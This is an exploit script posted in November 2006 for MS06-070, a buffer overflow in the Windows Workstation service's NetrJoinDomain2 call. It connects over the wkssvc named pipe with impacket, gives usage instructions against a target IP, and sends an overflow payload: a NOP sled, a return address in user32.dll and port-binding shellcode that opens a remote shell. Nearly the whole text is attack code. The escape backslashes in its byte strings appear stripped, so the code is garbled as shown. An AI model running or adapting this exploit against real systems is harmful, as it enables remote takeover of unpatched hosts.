ms06070-py.txt
Posted on 20 November 2006
#!/usr/bin/python # MS06-070 Windows WorkStation NetpManageIPCConnect Vulnerability Exploit # Tested on windows 2000 server SP4 # # Usage: python NetAPI-NetrJoinDomain2.py <target ip> <domainname> # Requires a domain controller on the network (configure samba as DC) # Requires python and impacket # # Winny M Thomas ;-) from impacket.dcerpc import transport from impacket import uuid import sys import socket import struct def DCEconnectAndExploit(target, domain): baselen = 3708 stringbinding = "ncacn_np:%(host)s[\pipe\%(pipe)s]" stringbinding %= {'host': target,'pipe': 'wkssvc','port': 445,} print 'Connecting to named pipe (wkssvc)' trans = transport.DCERPCTransportFactory(stringbinding) trans.connect() print 'Setting up DCE transport' dce = trans.DCERPC_class(trans) dce.bind(uuid.uuidtup_to_bin(('6bffd098-a112-3610-9833-46c3f87e345a','1.0'))) print 'Sending attack payload to target' #NetrJoinDomain2 data: Hostname query1 = "xaaxbbxccxdd" query1 += "x07x00x00x00" query1 += "x00x00x00x00" query1 += "x07x00x00x00" query1 += "x5Cx00x5Cx00" query1 += "x41x00x55x00" query1 += "x58x00x37x00" query1 += "x00x00x00x00" #NetrJoinDomain2 data: Domain/Hostname targetd = 'x00'.join(list(domain)) + 'x00' Len = baselen + len(domain) query2 = struct.pack('L', Len) query2 += struct.pack('L', 0) query2 += struct.pack('L', Len) query2 += targetd query3 = "x5Cx00x5Cx00x76x00x90x90" query3 += "x90x90" * 1058 query3 += "xEBx06" #6 byte jump from current pointer in ebx query3 += "x27x16xE1x77" #Address from user32.dll (0x77E11627) #350 byte port binding shellcode query3 += "x90x90x90x90x90x90" query3 += "x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73" query3 += "x13xe9x59x23xcex83xebxfcxe2xf4x15x33xc8x83" query3 += "x01xa0xdcx31x16x39xa8xa2xcdx7dxa8x8bxd5xd2" query3 += "x5fxcbx91x58xccx45xa6x41xa8x91xc9x58xc8x87" query3 += "x62x6dxa8xcfx07x68xe3x57x45xddxe3xbaxeex98" query3 += "xe9xc3xe8x9bxc8x3axd2x0dx07xe6x9cxbcxa8x91" query3 += "xcdx58xc8xa8x62x55x68x45xb6x45x22x25xeax75" query3 += "xa8x47x85x7dx3fxafx2ax68xf8xaax62x1ax13x45" query3 += "xa9x55xa8xbexf5xf4xa8x8exe1x07x4bx40xa7x57" query3 += "xcfx9ex16x8fx45x9dx8fx31x10xfcx81x2ex50xfc" query3 += "xb6x0dxdcx1ex81x92xcex32xd2x09xdcx18xb6xd0" query3 += "xc6xa8x68xb4x2bxccxbcx33x21x31x39x31xfaxc7" query3 += "x1cxf4x74x31x3fx0ax70x9dxbax0ax60x9dxaax0a" query3 += "xdcx1ex8fx31x32x95x8fx0axaax2fx7cx31x87xd4" query3 += "x99x9ex74x31x3fx33x33x9fxbcxa6xf3xa6x4dxf4" query3 += "x0dx27xbexa6xf5x9dxbcxa6xf3xa6x0cx10xa5x87" query3 += "xbexa6xf5x9exbdx0dx76x31x39xcax4bx29x90x9f" query3 += "x5ax99x16x8fx76x31x39x3fx49xaax8fx31x40xa3" query3 += "x60xbcx49x9exb0x70xefx47x0ex33x67x47x0bx68" query3 += "xe3x3dx43xa7x61xe3x17x1bx0fx5dx64x23x1bx65" query3 += "x42xf2x4bxbcx17xeax35x31x9cx1dxdcx18xb2x0e" query3 += "x71x9fxb8x08x49xcfxb8x08x76x9fx16x89x4bx63" query3 += "x30x5cxedx9dx16x8fx49x31x16x6exdcx1ex62x0e" query3 += "xdfx4dx2dx3dxdcx18xbbxa6xf3xa6x19xd3x27x91" query3 += "xbaxa6xf5x31x39x59x23xce"; query3 += "x90x90" * 2467 query3 += "x00x00" query3 += "x00x00x00x00" query3 += "x00x00x00x00" query3 += "x00x00x00x00" query3 += "x00x00" query3 += "x01x00x00x00" query = query1 + query2 + query3 dce.call(0x16, query) if __name__ == '__main__': try: target = sys.argv[1] domain = sys.argv[2] except IndexError: print 'Usage: %s <target ip> <domain>' % sys.argv[0] sys.exit(-1) DCEconnectAndExploit(target, domain)
